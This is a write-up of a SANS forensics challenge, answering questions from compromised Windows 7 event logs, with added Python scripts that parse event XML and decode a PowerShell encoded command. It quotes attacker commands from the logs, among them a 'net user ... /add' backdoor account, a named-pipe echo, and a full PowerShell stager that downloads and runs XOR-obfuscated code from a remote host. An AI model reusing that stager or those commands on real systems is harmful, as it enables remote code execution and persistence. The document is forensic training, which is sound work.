These weren't too bad: as long as you downloaded them on a Mac or Linux box (which fetches the actual .evtx file) and copied them onto a Windows 7+ VM, all you had to do was double-click the file in the Windows VM and the program you needed opened automatically. The only two where the answer couldn't be read straight out of the event logs were the PowerShell questions, where you had to study security2.evtx: you had to Base64-decode the encoded string in the PowerShell command, which gives you the User-Agent, and the same decoded string gives you the IP address. The others were straightforward if you were looking for them.
What's the secret word for SANS San Diego 2016 day 4?
watchersonthefirewall
Group add - (5 pts)
The following series of questions are based on these two Windows event logs:
https://sanschallenge.org/files/sanschallenge-security.evtx
https://sanschallenge.org/files/sanschallenge-system.evtx
They are the security and system event logs from a compromised Windows 7 system. Analyze these files on a Windows 7+ system.
Part of your challenge requires you to determine which event log to use to answer each question.
What is the Security ID of the user added to a security-enabled local group?
Answer with the complete security ID, for example:
S-1-5-21-1234567890-1234567890-1234567890-1234
security.evtx
S-1-5-21-3463664321-2923530833-3546627382-1007
Name that password - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
What is rachel's password?
security.evtx
There is a command in one of the logs:
net user rachel replicant2 /add
This is a command to add a user and a password to the SAM database.
replicant2
Suspicious service - (5 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
A suspicious service was created, with a 16-character service name. What is the name of the service? The answer is a 16-character string, with mixed case.
Suspicious pipe - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
A suspicious pipe was created: what is the name of the pipe? Answer with the name itself, and omit any directories. For example, if the pipe is: \\.\pipe\name
...the answer would be "name" without the quotes.
This was found in another command:
cmd.exe /c echo uxjxtu > \\.\pipe\uxjxtu
uxjxtu
Name that VBS - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
A suspicious VBScript is run from a temporary folder. What is the name of the .vbs script?
Include the .vbs script name only, preserve the case, and omit the directory. For example, if the path was:
C:\Windows\TEMP\ExAmPLe.vbs
...the answer would be 'ExAmPLe.vbs' without the quotes.
Not rocket science: this was the only one in the security.evtx that I could find that was run out of a temp directory.
WvkkaCoF.vbs
Name that EXE - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
A suspicious executable is run from a temporary folder. What is the name of the executable? Include the EXE name only, preserve the case, and omit the directory. For example, if the path was:
C:\Windows\Temp\asdfgh\ExAmPLe.exe
...the answer would be 'ExAmPLe.exe' without the quotes.
This was the only one in the security.evtx that I could find that was run out of a temp directory.
ZaCVvSRkGaIJZ.exe
Source Workstation - (10 pts)
Inspect sanschallenge-security.evtx and sanschallenge-system.evtx
What is the name of the Source Workstation that created the event: "The computer attempted to validate the credentials for an account"? The answer is a mixed case string.
So yet again, this one was in the security.evtx.
ZgTtCUS6fFdExXeu
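Every question in this first series maps to one event ID: member added to a security-enabled local group is Security 4732 (the SID is in MemberSid), process launches are Security 4688 (NewProcessName, plus CommandLine when command-line auditing is on), "The computer attempted to validate the credentials for an account" is Security 4776 (Workstation), and service installation is System 7045 (ServiceName). The script below is an added example, not part of the write-up or the challenge: it takes records in the standard event XML shape (what Event Viewer's XML view or Get-WinEvent's ToXml() emit) and pulls each answer from the right ID. The sample records are constructed; their values are the ones given above, except the 7045 service fields, which the write-up never states and which are placeholders here, and the directory parts of the Temp paths, which follow the challenge's own examples.

```python
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespace on every Windows event record, as emitted by Event Viewer's
# "XML View" or by Get-WinEvent ... | ForEach-Object { $_.ToXml() }.
NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

def _rec(event_id, channel, **data):
    """Build one constructed event record in the standard event XML shape."""
    fields = "".join(f'<Data Name="{k}">{escape(v)}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS[1:-1]}"><System><EventID>{event_id}</EventID>'
            f'<Channel>{channel}</Channel></System><EventData>{fields}</EventData></Event>')

# Constructed sample records (values from the write-up; service fields are placeholders).
SECURITY_XML = [
    _rec(4732, "Security", MemberSid="S-1-5-21-3463664321-2923530833-3546627382-1007"),
    _rec(4688, "Security", NewProcessName=r"C:\Windows\System32\net.exe",
         CommandLine="net user rachel replicant2 /add"),
    _rec(4688, "Security", NewProcessName=r"C:\Windows\System32\cmd.exe",
         CommandLine=r"cmd.exe /c echo uxjxtu > \\.\pipe\uxjxtu"),
    _rec(4688, "Security", NewProcessName=r"C:\Windows\System32\cscript.exe",
         CommandLine=r"cscript.exe C:\Windows\TEMP\WvkkaCoF.vbs"),
    # CommandLine is only logged when process command-line auditing is enabled,
    # so NewProcessName has to be searched as well.
    _rec(4688, "Security", NewProcessName=r"C:\Windows\Temp\asdfgh\ZaCVvSRkGaIJZ.exe"),
    _rec(4776, "Security", Workstation="ZgTtCUS6fFdExXeu"),
]
SYSTEM_XML = [
    _rec(7045, "System", ServiceName="PLACEHOLDER_SERVICE_NAME",
         ImagePath="PLACEHOLDER_IMAGE_PATH"),
]

def parse_event(xml_text):
    """Flatten one record into {EventID, Channel, <Data Name>: text}."""
    root = ET.fromstring(xml_text)
    ev = {"EventID": int(root.findtext(f"{NS}System/{NS}EventID")),
          "Channel": root.findtext(f"{NS}System/{NS}Channel")}
    for d in root.iter(f"{NS}Data"):
        ev[d.get("Name")] = (d.text or "").strip()
    return ev

def values(events, event_id, field):
    """Values of `field` from every event with the given ID, in log order."""
    return [e[field] for e in events if e["EventID"] == event_id and field in e]

# ...\Temp\[sub\dirs\]name.vbs|exe  ->  (name.ext, ext)
TEMP_RE = re.compile(r"\\temp\\(?:[^\\\s]+\\)*([^\\\s\"']+\.(vbs|exe))", re.I)
PIPE_RE = re.compile(r"\\\\\.\\pipe\\([^\s\"']+)")
NET_USER_RE = re.compile(r"(?i)\bnet1?(?:\.exe)?\s+user\s+\S+\s+\S+\s+/add\b")

def from_temp(strings, ext):
    """Basenames of .vbs/.exe files launched from a ...\\Temp\\ folder (deduplicated)."""
    hits = [m.group(1) for s in strings for m in TEMP_RE.finditer(s)
            if m.group(2).lower() == ext]
    return list(dict.fromkeys(hits))

def triage(security_xml, system_xml):
    """Answer each question of the series from the event ID that carries it."""
    sec = [parse_event(x) for x in security_xml]
    sysl = [parse_event(x) for x in system_xml]
    launched = values(sec, 4688, "CommandLine") + values(sec, 4688, "NewProcessName")
    return {
        "group_add_sid": values(sec, 4732, "MemberSid"),                 # Security 4732
        "net_user_add": [c for c in launched if NET_USER_RE.search(c)],  # Security 4688
        "pipe_names": [p for c in launched for p in PIPE_RE.findall(c)],
        "temp_vbs": from_temp(launched, "vbs"),
        "temp_exe": from_temp(launched, "exe"),
        "source_workstation": values(sec, 4776, "Workstation"),          # Security 4776
        "service_name": values(sysl, 7045, "ServiceName"),               # System 7045
    }

if __name__ == "__main__":
    for k, v in triage(SECURITY_XML, SYSTEM_XML).items():
        print(f"{k:>20}: {v}")
```

On a real export the only change is feeding the XML of every record from each channel into `triage`; the point of searching both CommandLine and NewProcessName is that a Windows 7 box without command-line auditing still records the image path, which is enough for the two "run from a temporary folder" questions.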
Compromised user - (5 pts)
The next series of questions are based on the following evtx file:
https://sanschallenge.org/files/sanschallenge2-security.evtx
Notice the "2" in the name: this is a different file from the one analyzed in the previous series of questions.
A PowerShell-based post exploitation framework is launched via "launcher.bat". What is the account name of the user that ran launcher.bat? The account name is a string, mixed case.
IEUser
Base64-decoding the encoded string in the PowerShell command found in the 2-security.evtx gives the following, which answers the next two questions:
$wC=NeW-ObJecT System.NeT.WebCLIENt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$wc.HEAdErs.ADd('User-Agent',$u);$wc.PRoXY = [SystEm.NET.WEBREQUeST]::DEFAuLTWebPRoxY;$WC.PRoxy.CREdentiAls = [SYsTEM.NeT.CreDEnTialCaChe]::DefaultNetWorKCREdenTIaLS;$K=')0dhCy1J9s3qY@%L!7pu]T|vV}tn[AQR';$i=0;[CHAR[]]$b=([cHaR[]]($WC.DOWNLOadSTRInG("http://192.168.198.149:8080/index.asp")))|%{$_-BXoR$k[$i++%$K.LEnGTH]};IEX ($b-jOIn'')
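The decode step described above is mechanical enough to script. Below is an added example, not code from the write-up or from the framework that produced the one-liner: it Base64-decodes a `-EncodedCommand` blob (which is UTF-16LE, the detail that trips people up when they try a plain Base64 decoder), then pulls out the User-Agent, the download URL, the IPv4 address and the XOR key. Because the write-up shows only the decoded command, the encoded input here is constructed by re-encoding that command; the regexes and the variable-resolution logic are the example's own assumptions about how such stagers are written.

```python
import base64
import re

# The one-liner exactly as it appears in the write-up above, decoded.
STAGER = (
    "$wC=NeW-ObJecT System.NeT.WebCLIENt;"
    "$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';"
    "$wc.HEAdErs.ADd('User-Agent',$u);"
    "$wc.PRoXY = [SystEm.NET.WEBREQUeST]::DEFAuLTWebPRoxY;"
    "$WC.PRoxy.CREdentiAls = [SYsTEM.NeT.CreDEnTialCaChe]::DefaultNetWorKCREdenTIaLS;"
    "$K=')0dhCy1J9s3qY@%L!7pu]T|vV}tn[AQR';$i=0;"
    '[CHAR[]]$b=([cHaR[]]($WC.DOWNLOadSTRInG("http://192.168.198.149:8080/index.asp")))'
    "|%{$_-BXoR$k[$i++%$K.LEnGTH]};IEX ($b-jOIn'')"
)

# Constructed input: the form a 4688 command line carries after
# "powershell.exe -EncodedCommand <...>", i.e. UTF-16LE text, Base64-encoded.
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode("ascii")

def decode_encoded_command(b64):
    """Base64-decode an -EncodedCommand blob, tolerating stripped '=' padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    # -EncodedCommand is always UTF-16LE; for ASCII script text every odd byte
    # is NUL. Anything that does not look like that is treated as plain UTF-8.
    if len(raw) % 2 == 0 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16le")
    return raw.decode("utf-8", errors="replace")

# $name='...' or $name="..." assignments (PowerShell variable names are case-insensitive)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(?:'([^']*)'|\"([^\"]*)\")")
# .Add('User-Agent', <$var | 'literal' | "literal">)
UA_RE = re.compile(r"\.add\(\s*['\"]user-agent['\"]\s*,\s*(\$\w+|'[^']*'|\"[^\"]*\")\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)
XOR_RE = re.compile(r"-bxor\s*\$(\w+)\s*\[", re.I)
IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

def _literal(token, variables):
    """Resolve a token to its string: $var via the assignment table, else strip quotes."""
    if token.startswith("$"):
        return variables.get(token[1:].lower())
    return token[1:-1]

def extract_iocs(script):
    """Pull the analyst-relevant values out of a decoded stager."""
    variables = {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
                 for m in ASSIGN_RE.finditer(script)}
    ua = UA_RE.search(script)
    xor = XOR_RE.search(script)
    urls = list(dict.fromkeys(URL_RE.findall(script)))
    ipv4 = list(dict.fromkeys(ip for u in urls for ip in IPV4_RE.findall(u)))
    return {
        "user_agent": _literal(ua.group(1), variables) if ua else None,
        "urls": urls,
        "ipv4": ipv4,
        "xor_key": variables.get(xor.group(1).lower()) if xor else None,
    }

if __name__ == "__main__":
    for k, v in extract_iocs(decode_encoded_command(ENCODED)).items():
        print(f"{k:>10}: {v}")
```

The variable lookup matters because the User-Agent is not a literal in the `.Add()` call but a reference to `$u`, and `$k` versus `$K` only works because PowerShell ignores case in variable names; the XOR key is recovered the same way so that a captured copy of index.asp can be decoded during the investigation.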
User-Agent - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx
The PowerShell-based post exploitation framework manually sets a user agent. What is the user agent?
Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
IP address - (15 pts)
Inspect https://sanschallenge.org/files/sanschallenge2-security.evtx
What IP address is index.asp downloaded from? Respond with the IPv4 address in dotted-quad format, for example "192.168.1.2" without the quotes.
192.168.198.149